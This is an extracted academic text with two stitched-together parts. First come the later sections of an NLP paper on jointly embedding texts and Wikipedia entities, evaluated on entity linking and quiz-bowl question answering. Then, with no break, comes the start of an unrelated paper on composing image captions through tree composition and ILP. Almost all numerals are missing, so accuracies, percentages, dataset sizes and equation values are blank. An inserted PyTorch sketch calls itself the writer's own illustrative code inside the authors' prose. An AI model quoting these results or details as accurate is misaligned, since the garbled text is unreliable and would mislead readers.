the second method is the same as sg-proj except that the training corpus of the pre-trained representations is augmented using the dbpedia abstract corpus (denoted by sg-proj-dbp). we augmented the corpus by simply concatenating the wikipedia corpus and the dbpedia abstract corpus; similar to the wikipedia corpus, we replaced each entity annotation in the dbpedia abstract corpus by the unique identifier of the entity referred to by the annotation. regarding the ntee and the fixed ntee models, sentences (rather than paragraphs) were used to train the proposed representations because of the superior performance of this approach on both the conll and tac datasets. further, we did not update our representations of words (vw) and entities (ve) in the training of our el method, because updating them did not generally improve the performance. additionally, we used a vector filled with zeros as the representation of entities that were not contained in our vocabulary.
table : hyper-parameters used for el and qa tasks. hidden units is the number of units in the hidden layers, and dropout is the dropout probability. rows cover the el settings (conll and tac, each with the ntee, ntee w/o strsim, fixed ntee, sg-proj, and sg-proj-dbp models) and the factoid qa settings (history and literature, each with the ntee, fixed ntee, sg-proj, and sg-proj-dbp models).
. . baselines
we adopt the following six recent state-of-the-art el methods as our baselines:
• hoffart (hoffart et al., ) used a graph-based approach that finds a dense subgraph of entities in a document to address el.
• he (he et al., ) proposed a method for learning the representations of mention contexts and entities from kb using stacked denoising auto-encoders. these representations were then used to address el.
• chisholm (chisholm and hachey, ) used a support vector machine (svm) with various features derived from kb and a wikilinks dataset (singh et al., ).
• pershina (pershina et al., ) improved el by modeling coherence using the personalized page rank algorithm.
• globerson (globerson et al., ) improved the coherence model for el by introducing an attention mechanism in order to focus only on strong relations of entities.
• yamada (yamada et al., ) proposed a model for learning the joint distributed representations of words and kb entities from kb, and addressed el using context models based on the representations.
. . results
table compares the results of our method with those obtained with the state-of-the-art methods. our method achieved strong results on both the conll and the tac datasets. in particular, the ntee model clearly outperformed the other proposed models. we also tested the performance of the ntee model without using the string similarity features (strsim) and found that these features also contributed to the performance. furthermore, our method successfully outperformed all the recent strong state-of-the-art methods on both datasets. this is remarkable because most state-of-the-art el methods, including all baseline methods except that of he, adopt global approaches, in which all entity mentions in a document are simultaneously disambiguated based on coherence among disambiguation decisions. our method depends only on the local (or textual) context available in the target document.
thus, the performance can likely be improved further by combining a global model with our local model, as frequently observed in past work (ratinov et al., ; chisholm and hachey, ; yamada et al., ).
table : accuracies of the proposed method and the state-of-the-art methods, reported as conll micro- and macro-accuracy and tac micro-accuracy for ntee, ntee (w/o strsim), fixed ntee, sg-proj, sg-proj-dbp, hoffart ( ), he ( ), chisholm ( ), pershina ( ), globerson ( ), and yamada ( ).
we also conducted a brief error analysis using the ntee model and the test set of the conll dataset by randomly inspecting errors. as a result, % of the errors were mentions whose referent entities were not contained in our vocabulary. in this case, our method could not incorporate any contextual information, thus likely resulting in disambiguation errors. the other major type of error involved mentions of location names. the dataset contains many location names (e.g., japan) referring to sports team entities (e.g., japan national football team). it appeared that our method neglected to distinguish whether a location name refers to the location itself or to a sports team. in particular, our method often wrongly resolved mentions referring to sports team entities into the corresponding location entities, and vice versa. these accounted for . % and . % of the total number of errors, respectively. moreover, we observed several difficult cases such as selecting hindu instead of hindu nationalism, christian instead of catholicism, new york city instead of new york, and so forth.
. factoid question answering
question answering (qa) has been one of the central problems in nlp research for the last few decades. factoid qa is one of the typical types of qa that aims to predict an entity (e.g., events, authors, and actors) that is discussed in a given question. quiz bowl is a popular trivia quiz game in which players are asked questions consisting of – sentences describing entities. the quiz bowl dataset has frequently been used for evaluating factoid qa methods in recent literature on qa (iyyer et al., ; iyyer et al., ; xu and li, ). in this section, we demonstrate that our proposed representations can be effectively used as background knowledge for the qa task.
. . setup
we followed an existing method (xu and li, ) for our experimental setup. we used the public quiz bowl dataset proposed in iyyer et al. ( ). following past work (iyyer et al., ; iyyer et al., ; xu and li, ), we only used questions belonging to the history and literature categories, and only used answers that appeared at least six times. for questions referring to the same answer, we sampled % each for the development and test sets, and used the remaining % for the training set. as a result, we obtained , training, development, and test questions for history, and , training, development, and test questions for literature. the number of possible answers was and in the history and literature categories, respectively.
. . our method
following past work (iyyer et al., ; iyyer et al., ; xu and li, ), we address this task as a classification problem that selects the most relevant answer from the possible answers observed in the dataset. we adopt the same neural network architecture described in section . . (see figure ). we use the following three features: the vector of the entity ve, the vector of the question vt (computed using eq. ( )), and the dot product of ve and vt.
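to make the shared scoring architecture concrete, the sketch below shows one possible implementation of the candidate scorer used for both el (section . ) and factoid qa: each candidate entity is scored from the concatenation of vt, ve, their dot product, and (for el only) a few extra features, followed by a relu hidden layer with dropout and a softmax over the candidates. this is our own illustrative pytorch code, not the authors' implementation (which is based on theano); layer sizes and argument names are placeholders.

```python
import torch
import torch.nn as nn

class CandidateScorer(nn.Module):
    # scores each candidate entity for a mention (el) or a question (qa);
    # pass n_extra_features=0 and extra=None for the qa setting
    def __init__(self, dim, n_extra_features, hidden_units, dropout):
        super().__init__()
        # hidden_units and dropout correspond to the hyper-parameters tuned on the
        # development sets (table ); concrete values are omitted here
        self.hidden = nn.Linear(2 * dim + 1 + n_extra_features, hidden_units)
        self.dropout = nn.Dropout(dropout)
        self.out = nn.Linear(hidden_units, 1)

    def forward(self, v_t, v_e, extra=None):
        # v_t: (batch, dim) text/question vectors
        # v_e: (batch, n_cand, dim) candidate entity vectors (normalized to unit length)
        # extra: (batch, n_cand, n_extra_features) el features such as popularity and prior
        n_cand = v_e.size(1)
        v_t_rep = v_t.unsqueeze(1).expand(-1, n_cand, -1)
        dot = (v_t_rep * v_e).sum(dim=-1, keepdim=True)  # unnormalized likelihood of e given t
        feats = [v_t_rep, v_e, dot] if extra is None else [v_t_rep, v_e, dot, extra]
        h = self.dropout(torch.relu(self.hidden(torch.cat(feats, dim=-1))))
        scores = self.out(h).squeeze(-1)                 # (batch, n_cand)
        return torch.log_softmax(scores, dim=-1)         # argmax gives the predicted entity
```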
note that we do not include other features in this task. the hyper-parameters used in our model (i.e., the number of units in the hidden layer and the dropout probability) are shown in table . we tuned these parameters using the development set of each dataset. unlike the el task, we updated all parameters, including the representations of words and entities, when training our qa method. we used stochastic gradient descent (sgd) to train the model. the mini-batch size was fixed at , and the learning rate was controlled by rmsprop. we used the accuracy on the development set of each dataset to detect the best epoch. the dataset was downloaded from https://cs.umd.edu/~miyyer/qblearn/. note that the public dataset is significantly smaller than the one used in past work (iyyer et al., ; iyyer et al., ) because they also used a proprietary dataset in addition to the public dataset. similar to our el method, we also normalize ve to unit length because of its overall higher accuracy. similar to the el task, we tested the four models to initialize the representations vt and ve, i.e., the ntee, the fixed ntee, the sg-proj, and the sg-proj-dbp models. further, the representations of the ntee model and the fixed ntee model were those trained with sentences because of their overall superior accuracy compared to those trained with paragraphs.
. . baselines
we use two types of baselines: two conventional bag-of-words (bow) models and two state-of-the-art neural network models. the details of these models are as follows:
• bow (iyyer et al., ) is a conventional approach using a logistic regression (lr) classifier trained with binary bow features to predict the correct answer.
• bow-dt (iyyer et al., ) is based on the bow baseline augmented with a feature set of dependency relation indicators.
• qanta (iyyer et al., ) is an approach based on a recursive neural network to derive distributed representations of questions. the method also uses the lr classifier with the derived representations as features.
• fts-brnn (xu and li, ) is based on a bidirectional recurrent neural network (rnn) with gated recurrent units (gru). similar to qanta, the method adopts the lr classifier with the derived representations as features.
. . results
table shows the results of our methods compared with those of the baseline methods. the results of bow, bow-dt, and qanta were obtained from xu and li ( ). we also include the result reported in iyyer et al. ( ) (denoted by qanta-full), which used a significantly larger dataset than ours for training and testing.
table : accuracies of the proposed method and the state-of-the-art methods for the factoid qa task, reported on the history and literature datasets for ntee, fixed ntee, sg-proj, sg-proj-dbp, bow, bow-dt, qanta, qanta-full, and fts-brnn.
the experimental results show that our ntee model achieved the best performance compared to the other proposed models and all the baseline methods on both the history and the literature datasets. in particular, despite the simplicity of the neural network architecture of our method compared to the state-of-the-art methods (i.e., qanta and fts-brnn), our method clearly outperformed these methods. this demonstrates the effectiveness of our proposed representations as background knowledge for the qa task. we also conducted a brief error analysis using the test set of the history dataset.
our observations indicated that our method mostly performed perfectly in terms of predicting the types of the target answers (e.g., locations, events, and people). however, our method erred in delicate cases such as predicting henry ii of england instead of henry i of england, and syracuse, sicily instead of sicily.
. qualitative analysis
in order to investigate what happens inside our model, we conducted a qualitative analysis using our proposed representations trained with sentences. we first inspected the word representations of our model and our pre-trained representations (i.e., the skip-gram model) by computing the top five similar words of five words (i.e., her, dry, spanish, tennis, moon) using cosine similarity. the results are presented in table . interestingly, our model is somewhat more specific than the skip-gram model. for example, there is only one word, she, whose cosine similarity to the word her is more than . in our model, whereas all the corresponding similar words in the skip-gram model (i.e., she, his, herself, him, and mother) satisfy that condition. we observe a similar trend for the similar words of dry. furthermore, all the words similar to tennis are strictly related to the sport itself in our model, whereas the corresponding similar words of the skip-gram model contain broader words such as ball sports (e.g., badminton and volleyball). a similar trend can be observed for the similar words of spanish and moon.
table : examples of top five similar words (by cosine similarity) in our learned word representations compared with those of the skip-gram model.
her | our model: she, to, and, his, in | skip-gram: she, his, herself, him, mother
dry | our model: wet, arid, moisture, grows, dried | skip-gram: wet, moist, drier, drying, moister
tennis | our model: doubles, atp, wimbledon, wta, slam | skip-gram: badminton, hardcourt, volleyball, racquetball, squash
spanish | our model: spain, madrid, andalusia, valencia, seville | skip-gram: spain, portuguese, french, catalan, mexican
moon | our model: lunar, crater, rim, craters, midpoint | skip-gram: lunar, moons, sun, earth, sadasaa
similarly, we also compared our entity representations with those of the pre-trained representations by computing the top five similar entities of six entities (i.e., europe, golf, tea, smartphone, scarlett johansson, and the lord of the rings) with respect to cosine similarity. table contains the results. for the entities europe and golf, we observe similar trends to our word representations. particularly, in our model, the most similar entities of europe and golf are eastern europe and golf course, respectively, whereas those of the skip-gram model are asia and tennis, respectively. however, the similar entities of most entities (e.g., tea, smartphone, scarlett johansson, and the lord of the rings) appear to be similar between our model and the skip-gram model.
related work
various neural network models that learn distributed representations of arbitrary-length texts (e.g., paragraphs and sentences) have recently been proposed. these models aim to produce general-purpose text representations that can be used with ease in various downstream nlp tasks. although most of these models learn text representations from an unstructured text corpus (le and mikolov, ; kiros et al., ; kenter et al., ), there have also been proposed models that learn text representations by leveraging structured linguistic resources. for instance, wieting et al. ( ) trained their model using a large number of noisy phrase pairs retrieved from the paraphrase database (ppdb) (ganitkevitch et al., ). hill et al. ( b) use several public dictionaries to train the model by mapping definition texts in a dictionary to representations of the words explained by these texts. to our knowledge, our work is the first to learn generic text representations with the supervision of entity annotations.
several methods have also been proposed for extending word embedding methods. for example, levy and goldberg ( ) proposed a method to train word embeddings with dependency-based contexts, and luan et al. ( ) used semantic role labeling for generating contexts to train word embeddings. moreover, a few recent studies on learning entity embeddings based on word embedding methods have been reported (hu et al., ; li et al., ). these models are typically based on the skip-gram model and directly model the semantic relatedness between kb entities. our work differs from these studies because we aim to learn representations of arbitrary-length texts in addition to entities.
another related approach is relational embedding (or knowledge embedding) (bordes et al., ; wang et al., ; lin et al., ), which encodes entities as continuous vectors and relations as operations on the vector space, such as vector addition. these models typically learn representations from large kb graphs consisting of entities and relations. similarly, the universal schema (riedel et al., ; toutanova et al., ; verga et al., ) jointly learns continuous representations of kb relations, entities, and surface text patterns for the relation extraction task.
finally, yamada et al. ( ) recently proposed a method to jointly learn the embeddings of words and entities from wikipedia using the skip-gram model and applied it to el. our method differs from theirs in that their method does not directly model arbitrary-length texts (i.e., paragraphs and sentences), which we showed to be highly effective for various tasks in this paper. moreover, we also showed that the joint embedding of texts and entities can be applied not only to el but also to wider applications such as semantic textual similarity and factoid qa.
conclusions
in this paper, we presented a novel model capable of jointly learning distributed representations of texts and entities from a large number of entity annotations in wikipedia. our aim was to construct the proposed general-purpose model such that it enables practitioners to address various nlp tasks with ease. we achieved state-of-the-art results on three important nlp tasks (i.e., semantic textual similarity, entity linking, and factoid question answering), which clearly demonstrates the effectiveness of our model. furthermore, the qualitative analysis showed that the characteristics of our learned representations apparently differ from those of the conventional word embedding model (i.e., the skip-gram model), which we plan to investigate in more detail in the future. moreover, we make our code and trained models publicly available for future research. future work includes analyzing our model more extensively and exploring the effectiveness of our model on other nlp tasks. we also aim to test more expressive neural network models (e.g., lstm) to derive our text representations.
furthermore, we believe that one of the promising directions would be to incorporate the rich structural data of the kb, such as relationships between entities, links between entities, and the hierarchical category structure of entities.
table : examples of top five similar entities (by cosine similarity) in our learned entity representations compared with those of the skip-gram model.
europe | our model: eastern europe, western europe, central europe, asia, north america | skip-gram: asia, western europe, north america, central europe, americas
golf | our model: golf course, pga tour, lpga, professional golfer, u.s. open | skip-gram: tennis, lpga, pga tour, golf course, nicklaus design
tea | our model: coffee, green tea, black tea, camellia sinensis, spice | skip-gram: coffee, green tea, black tea, camellia sinensis, spice
smartphone | our model: tablet computer, mobile device, personal digital assistant, android (operating system), iphone | skip-gram: tablet computer, personal digital assistant, mobile device, android (operating system), feature phone
scarlett johansson | our model: kirsten dunst, anne hathaway, cameron diaz, natalie portman, jessica biel | skip-gram: anne hathaway, natalie portman, kirsten dunst, cameron diaz, kate beckinsale
the lord of the rings | our model: the hobbit, j. r. r. tolkien, the silmarillion, the fellowship of the ring, the lord of the rings (film series) | skip-gram: the hobbit, j. r. r. tolkien, the silmarillion, the fellowship of the ring, elvish languages
acknowledgements
we would like to thank the tacl editor kristina toutanova and the anonymous reviewers for helpful comments on an earlier draft of this paper.
references
eneko agirre, carmen banea, claire cardie, daniel cer, mona diab, aitor gonzalez-agirre, weiwei guo, rada mihalcea, german rigau, and janyce wiebe. . semeval- task : multilingual semantic textual similarity. in proceedings of the th international workshop on semantic evaluation, pages – . antoine bordes, nicolas usunier, alberto garcia-duran, jason weston, and oksana yakhnenko. . translating embeddings for modeling multi-relational data. in advances in neural information processing systems , pages – . martin brümmer, milan dojchinovski, and sebastian hellmann. . dbpedia abstracts: a large-scale, open, multilingual nlp training corpus. in proceedings of the tenth international conference on language resources and evaluation. andrew chisholm and ben hachey. . entity disambiguation with web links. transactions of the association for computational linguistics, : – . silviu cucerzan. . large-scale named entity disambiguation based on wikipedia data. in proceedings of the joint conference on empirical methods in natural language processing and computational natural language learning, pages – . wei fang, jianwen zhang, dilin wang, zheng chen, and ming li. . entity disambiguation by knowledge and text jointly embedding. in proceedings of the th signll conference on computational natural language learning, pages – . evgeniy gabrilovich and shaul markovitch. . computing semantic relatedness using wikipedia-based explicit semantic analysis. in international joint conference on artificial intelligence, pages – . juri ganitkevitch, benjamin van durme, and chris callison-burch. . ppdb: the paraphrase database.
in proceedings of the conference of the north american chapter of the association for computational linguistics: human language tech- nologies, pages – . amir globerson, nevena lazic, soumen chakrabarti, amarnag subramanya, michael ringaard, and fer- nando pereira. . collective entity resolution with multi-focal attention. in proceedings of the th annual meeting of the association for computational linguistics (volume : long papers), pages – . hannaneh hajishirzi, leila zilles, daniel s weld, and luke zettlemoyer. . joint coreference res- olution and named-entity linking with multi-pass sieves. in proceedings of the conference on empirical methods in natural language processing, pages – . zhengyan he, shujie liu, mu li, ming zhou, longkai zhang, and houfeng wang. . learning entity representation for entity disambiguation. in pro- ceedings of the st annual meeting of the associa- tion for computational linguistics (volume : short papers), pages – . felix hill, kyunghyun cho, and anna korhonen. a. learning distributed representations of sentences from unlabelled data. in proceedings of the conference of the north american chapter of the as- sociation for computational linguistics: human lan- guage technologies, pages – . felix hill, kyunghyun cho, anna korhonen, and yoshua bengio. b. learning to understand phrases by embedding the dictionary. transactions of the asso- ciation for computational linguistics, : – . johannes hoffart, mohamed amir yosef, ilaria bordino, hagen fürstenau, manfred pinkal, marc spaniol, bilyana taneva, stefan thater, and gerhard weikum. . robust disambiguation of named entities in text. in proceedings of the conference on empirical methods in natural language processing, pages – . zhiting hu, poyao huang, yuntian deng, yingkai gao, and eric xing. . entity hierarchy embedding. in proceedings of the rd annual meeting of the associ- ation for computational linguistics and the th inter- national joint conference on natural language pro- cessing (volume : long papers), pages – . mohit iyyer, jordan boyd-graber, leonardo claudino, richard socher, and hal daumé iii. . a neural network for factoid question answering over para- graphs. in proceedings of the conference on empirical methods in natural language processing, pages – . mohit iyyer, varun manjunatha, jordan boyd-graber, and hal daumé iii. . deep unordered com- position rivals syntactic methods for text classifica- tion. in proceedings of the rd annual meeting of the association for computational linguistics and the th international joint conference on natural language processing (volume : long papers), pages – . heng ji, ralph grishman, hoa trang dang, kira grif- fitt, and joe ellis. . overview of the tac knowledge base population track. in proceeding of text analytics conference. tom kenter, alexey borisov, and maarten de rijke. . siamese cbow: optimizing word embed- dings for sentence representations. in proceedings of the th annual meeting of the association for com- putational linguistics (volume : long papers), pages – . ryan kiros, yukun zhu, ruslan r salakhutdinov, richard zemel, raquel urtasun, antonio torralba, and sanja fidler. . skip-thought vectors. in ad- vances in neural information processing systems , pages – . quoc v. le and tomas mikolov. . distributed rep- resentations of sentences and documents. in proceed- ings of the st international conference on machine learning (volume ), pages – . omer levy and yoav goldberg. . dependency- based word embeddings. 
in proceedings of the nd annual meeting of the association for computational linguistics (volume : short papers), pages – . jiwei li, thang luong, and dan jurafsky. . a hierarchical neural autoencoder for paragraphs and documents. in proceedings of the rd annual meet- ing of the association for computational linguistics and the th international joint conference on natural language processing (volume : long papers), pages – . yuezhang li, ronghuo zheng, tian tian, zhiting hu, rahul iyer, and katia sycara. . joint embed- ding of hierarchical categories and entities for con- cept categorization and dataless classification. in proceedings of the th international conference on computational linguistics, pages – . yankai lin, zhiyuan liu, maosong sun, yang liu, and xuan zhu. . learning entity and relation em- beddings for knowledge graph completion. in pro- ceedings of the th aaai conference on artificial in- telligence, pages – . xiao ling, sameer singh, and daniel s. weld. . design challenges for entity linking. transactions of the association for computational linguistics, : – . yi luan, yangfeng ji, hannaneh hajishirzi, and boyang li. . multiplicative representations for unsuper- vised semantic role induction. in proceedings of the th annual meeting of the association for compu- tational linguistics (volume : short papers), pages – . marco marelli, stefano menini, marco baroni, luisa bentivogli, raffaella bernardi, and roberto zampar- elli. . a sick cure for the evaluation of compo- sitional distributional semantic models. in proceed- ings of the ninth international conference on lan- guage resources and evaluation, pages – . edgar meij, wouter weerkamp, and maarten de rijke. . adding semantics to microblog posts. in pro- ceedings of the fifth acm international conference on web search and data mining, pages – . rada mihalcea and andras csomai. . wikify!: linking documents to encyclopedic knowledge. in proceedings of the sixteenth acm conference on in- formation and knowledge management, pages – . tomas mikolov, greg corrado, kai chen, and jeffrey dean. a. efficient estimation of word repre- sentations in vector space. in proceedings of the in- ternational conference on learning representations, pages – . tomas mikolov, ilya sutskever, kai chen, greg s. cor- rado, and jeff dean. b. distributed represen- tations of words and phrases and their composition- ality. in advances in neural information processing systems , pages – . david milne and ian h. witten. . learning to link with wikipedia. in proceeding of the th acm con- ference on information and knowledge management, pages – . jeff mitchell and mirella lapata. . vector-based models of semantic composition. in proceedings of acl- : hlt, pages – . jeffrey pennington, richard socher, and christopher d manning. . glove: global vectors for word representation. in proceedings of the confer- ence on empirical methods in natural language pro- cessing, pages – . maria pershina, yifan he, and ralph grishman. . personalized page rank for named entity disam- biguation. in proceedings of the conference of the north american chapter of the association for computational linguistics: human language tech- nologies, pages – . lev ratinov, dan roth, doug downey, and mike an- derson. . local and global algorithms for dis- ambiguation to wikipedia. in proceedings of the th annual meeting of the association for computational linguistics: human language technologies, pages – . sebastian riedel, limin yao, andrew mccallum, and benjamin m marlin. . 
relation extraction with matrix factorization and universal schemas. in pro- ceedings of the conference of the north ameri- can chapter of the association for computational lin- guistics: human language technologies, pages – . sameer singh, amarnag subramanya, fernando pereira, and andrew mccallum. . wikilinks: a large- scale cross-document coreference corpus labeled via links to wikipedia. technical report um-cs- - . theano development team. . theano: a python framework for fast computation of mathematical ex- pressions. arxiv preprint arxiv: . v . tijmen tieleman and geoffrey hinton. . lecture . - rmsprop, coursera: neural networks for machine learning. technical report. kristina toutanova, danqi chen, patrick pantel, hoifung poon, pallavi choudhury, and michael gamon. . representing text for joint embedding of text and knowledge bases. in proceedings of the con- ference on empirical methods in natural language processing, pages – . patrick verga, david belanger, emma strubell, ben- jamin roth, and andrew mccallum. . multi- lingual relation extraction using compositional uni- versal schema. in proceedings of the confer- ence of the north american chapter of the associa- tion for computational linguistics: human language technologies, pages – . zhen wang, jianwen zhang, jianlin feng, and zheng chen. . knowledge graph and text jointly em- bedding. in proceedings of the conference on empirical methods in natural language processing, pages – . john wieting, mohit bansal, kevin gimpel, and karen livescu. . towards universal paraphrastic sen- tence embeddings. in proceedings of the inter- national conference on learning representations. dong xu and wu-jun li. . full-time supervi- sion based bidirectional rnn for factoid question answering. arxiv preprint arxiv: . v . ikuya yamada, hiroyuki shindo, hideaki takeda, and yoshiyasu takefuji. . joint learning of the em- bedding of words and entities for named entity dis- ambiguation. in proceedings of the th signll con- ference on computational natural language learn- ing, pages – . treetalk: composition and compression of trees for image descriptions polina kuznetsova† † stony brook university stony brook, ny pkuznetsova @cs.stonybrook.edu vicente ordonez‡ tamara l. berg‡ ‡ unc chapel hill chapel hill, nc {vicente,tlberg} @cs.unc.edu yejin choi†† ††university of washington seattle, wa yejin@cs.washington.edu abstract we present a new tree based approach to composing expressive image descriptions that makes use of naturally occuring web images with captions. we investigate two related tasks: image caption generalization and gen- eration, where the former is an optional sub- task of the latter. the high-level idea of our approach is to harvest expressive phrases (as tree fragments) from existing image descrip- tions, then to compose a new description by selectively combining the extracted (and op- tionally pruned) tree fragments. key algo- rithmic components are tree composition and compression, both integrating tree structure with sequence structure. our proposed system attains significantly better performance than previous approaches for both image caption generalization and generation. in addition, our work is the first to show the empirical ben- efit of automatically generalized captions for composing natural image descriptions. introduction the web is increasingly visual, with hundreds of bil- lions of user contributed photographs hosted online. 
a substantial portion of these images have some sort of accompanying text, ranging from keywords, to free text on web pages, to textual descriptions directly describing depicted image content (i.e., captions). we tap into the last kind of text, using naturally occurring pairs of images with natural language descriptions to compose expressive descriptions for query images via tree composition and compression. such automatic image captioning efforts could potentially be useful for many applications: from automatic organization of photo collections, to facilitating image search with complex natural language queries, to enhancing web accessibility for the visually impaired. on the intellectual side, by learning to describe the visual world from naturally existing web data, our study extends the domains of language grounding to the highly expressive language that people use in their everyday online activities.
there has been a recent spike in efforts to automatically describe visual content in natural language (yang et al., ; kulkarni et al., ; li et al., ; farhadi et al., ; krishnamoorthy et al., ; elliott and keller, ; yu and siskind, ; socher et al., ). this reflects the long-standing understanding that encoding the complexities and subtleties of image content often requires more expressive language constructs than a set of tags. now that visual recognition algorithms are beginning to produce reliable estimates of image content (perronnin et al., ; deng et al., a; deng et al., ; krizhevsky et al., ), the time seems ripe to begin exploring higher level semantic tasks.
there have been two main complementary directions explored for automatic image captioning. the first focuses on describing exactly those items (e.g., objects, attributes) that are detected by vision recognition, which subsequently confines what should be described and how (yao et al., ; kulkarni et al., ; kojima et al., ). approaches in this direction could be ideal for various practical applications such as image description for the visually impaired. however, it is not clear whether the semantic expressiveness of these approaches can eventually scale up to the casual, but highly expressive, language people naturally use in their online activities.
figure : harvesting phrases (as tree fragments) for the target image based on (partial) visual match.
in figure , for example, it would be hard to compose "i noticed that this funny cow was staring at me" or "you can see these beautiful hills only in the countryside" in a purely bottom-up manner based on the exact content detected. the key technical bottleneck is that the range of describable content (i.e., objects, attributes, actions) is ultimately confined by the set of items that can be reliably recognized by state-of-the-art vision techniques.
the second direction, in a complementary avenue to the first, has explored ways to make use of the rich spectrum of visual descriptions contributed by online citizens (kuznetsova et al., ; feng and lapata, ; mason, ; ordonez et al., ).
in these approaches, the set of what can be described can be substantially larger than the set of what can be recognized, where the former is shaped and defined by the data, rather than by humans. this allows the resulting descriptions to be substantially more expressive, elaborate, and interesting than what would be possible in a purely bottom-up manner. our work contributes to this second line of research.
one challenge in utilizing naturally existing multimodal data, however, is the noisy semantic alignment between images and text (dodge et al., ; berg et al., ). therefore, we also investigate a related task of image caption generalization (kuznetsova et al., ), which aims to improve the semantic image-text alignment by removing bits of text from existing captions that are less likely to be transferable to other images.
the high-level idea of our system is to harvest useful bits of text (as tree fragments) from existing image descriptions using detected visual content similarity, and then to compose a new description by selectively combining these extracted (and optionally pruned) tree fragments. this overall idea of composition based on extracted phrases is not new in itself (kuznetsova et al., ); however, we make several technical and empirical contributions.
first, we propose a novel stochastic tree composition algorithm based on extracted tree fragments that integrates both tree structure and sequence cohesion into structural inference. our algorithm permits a substantially higher level of linguistic expressiveness, flexibility, and creativity than those based on rules or templates (kulkarni et al., ; yang et al., ; mitchell et al., ), while also addressing long-distance grammatical relations in a more principled way than those based on hand-coded constraints (kuznetsova et al., ).
second, we address image caption generalization as an optional subtask of image caption generation, and propose a tree compression algorithm that performs a light-weight parsing to search for the optimal set of tree branches to prune. our work is the first to report empirical benefits of automatically compressed captions for image captioning.
the proposed approaches attain significantly better performance for both image caption generalization and generation tasks over competitive baselines and previous approaches. our work results in an improved image caption corpus with automatic generalization, which is publicly available (http://ilp-cky.appspot.com/).
harvesting tree fragments
given a query image, we retrieve images that are visually similar to the query image, then extract potentially useful segments (i.e., phrases) from their corresponding image descriptions. we then compose a new image description using these retrieved text fragments (§ ). extraction of useful phrases is guided by both visual similarity and the syntactic parse of the corresponding textual description. this extraction strategy, originally proposed by kuznetsova et al. ( ), attempts to make the best use of linguistic regularities with respect to objects, actions, and scenes, making it possible to obtain richer textual descriptions than what current state-of-the-art vision techniques can provide in isolation. in all of our experiments we use the captioned image corpus of ordonez et al. ( ), first pre-processing the corpus for relevant content by running deformable part model object detectors (felzenszwalb et al., ).
for our study, we run detectors for the object classes, set at a high confidence threshold for detection. as illustrated in figure , for a query image detection, we extract four types of phrases (as tree fragments). first, we retrieve relevant noun phrases from images with visually similar object detections. we use color, texture (leung and malik, ), and shape (dalal and triggs, ; lowe, ) based features, encoded in a histogram of vector-quantized responses, to measure visual similarity. second, we extract verb phrases for which the corresponding noun phrase takes the subject role. third, from those images with "stuff" detections, e.g., "water" or "sky" (typically mass nouns), we extract prepositional phrases based on the similarity of both visual appearance and relative spatial relationships between detected objects and "stuff". finally, we use global "scene" similarity (l distance between classification score vectors (xiao et al., )) to extract prepositional phrases referring to the overall scene, e.g., "at the conference," or "in the market". we perform this phrase retrieval process for each detected object in the query image and generate one sentence for each object. all sentences are then combined together to produce the final description. optionally, we apply image caption generalization (via compression) (§ ) to all captions in the corpus prior to the phrase extraction and composition.
tree composition
we model tree composition as constraint optimization. the input to our algorithm is the set of retrieved phrases (i.e., tree fragments), as illustrated in § . let p = {p0, ..., pl−1} be the set of all phrases across the four phrase types (objects, actions, stuff, and scene). we assume a mapping function pt : [0, l) → t, where t is the set of phrase types, so that the phrase type of pi is pt(i). in addition, let r be the set of pcfg production rules and nt be the set of nonterminal symbols of the pcfg. the goal is to find and combine a good sequence of phrases g, |g| ≤ |t| = n = , drawn from p, into a final sentence. more concretely, we want to select and order a subset of phrases (at most one phrase of each phrase type) while considering both the parse structure and n-gram cohesion across phrasal boundaries.
figure shows a simplified example of a composed sentence with its corresponding parse structure. for brevity, the figure shows only one phrase for each phrase type, but in actuality there would be a set of candidate phrases for each type. figure shows the cky-style representation of the internal mechanics of constraint optimization for the example composition from figure . each cell ij of the cky matrix corresponds to gij, a subsequence of g starting at position i and ending at position j. if a cell in the cky matrix is labeled with a nonterminal symbol s, it means that the corresponding tree of gij has s as its root.
although we visualize the operation using a cky-style representation in figure , note that composition requires more complex combinatorial decisions than cky parsing due to two additional considerations: we are (1) selecting a subset of candidate phrases, and (2) re-ordering the selected phrases (hence making the problem np-hard). therefore, we encode our problem using integer linear programming (ilp) (roth and tau yih, ; clarke and lapata, ) and use the cplex (ilog, inc, ) solver.
ilp variables
variables for sequence structure: variables α encode phrase selection and ordering:
αik = 1 iff phrase i ∈ p is selected for position k ∈ [0, n),
where k is one of the n = positions in a sentence (the number of positions is equal to the number of phrase types, since we select at most one phrase from each type).
figure : an example scenario of tree composition. only the first three phrases are chosen for the composition.
additionally, we define variables for each pair of adjacent phrases to capture sequence cohesion:
αijk = 1 iff αik = αj(k+1) = 1.
variables for tree structure: variables β encode the parse structure:
βijs = 1 iff the phrase sequence gij maps to the nonterminal symbol s ∈ nt,
where i ∈ [0, n) and j ∈ [i, n) index rows and columns of the cky-style matrix in figure . a corresponding example tree is shown in figure , where the phrase sequence g corresponds to the cell labeled with s. we also define variables to indicate selected pcfg rules in the resulting parse:
βijkr = 1 iff βijh = βikp = β(k+1)jq = 1,
where r = h → pq ∈ r and k ∈ [i, j). index k points to the boundary of the split between the two children, as shown in figure for the sequence g .
auxiliary variables: for notational convenience, we also include:
γijk = 1 iff ∑s∈nt βijs = ∑s∈nt βiks = ∑s∈nt β(k+1)js = 1.
ilp objective function
we model tree composition as maximization of the following objective function:
f = ∑i fi · ∑k=0..n−1 αik + ∑ij fij · ∑k=0..n−2 αijk + ∑ij ∑k=i..j−1 ∑r∈r fr · βijkr
ilp constraints
techniques for encoding the logical conjunction of two variables have been discussed by clarke and lapata ( ). for equation , we add the following constraints (similar constraints are also added for equations and ):
∀ i, j, k: αijk ≤ αik, αijk ≤ αj(k+1), and αijk + (1 − αik) + (1 − αj(k+1)) ≥ 1.
consistency between tree leaves and sequences: the ordering of phrases implied by the αijk variables must be consistent with the ordering of phrases implied by the β variables.
this can be achieved by aligning the leaf cells (i.e., βkks) in the cky-style matrix with the α variables as follows:
∀ i, k: αik ≤ ∑s∈si βkks,
∀ k: ∑i αik = ∑s∈nt βkks,
where si refers to the set of pcfg nonterminals that are compatible with the phrase type of pi. for example, si = {nn, np, ...} if pi corresponds to an "object" (noun phrase). thus, the first equation enforces the correspondence between phrase types and nonterminal symbols at the tree leaves, and the second enforces that the number of selected phrases and instantiated tree leaves must be the same.
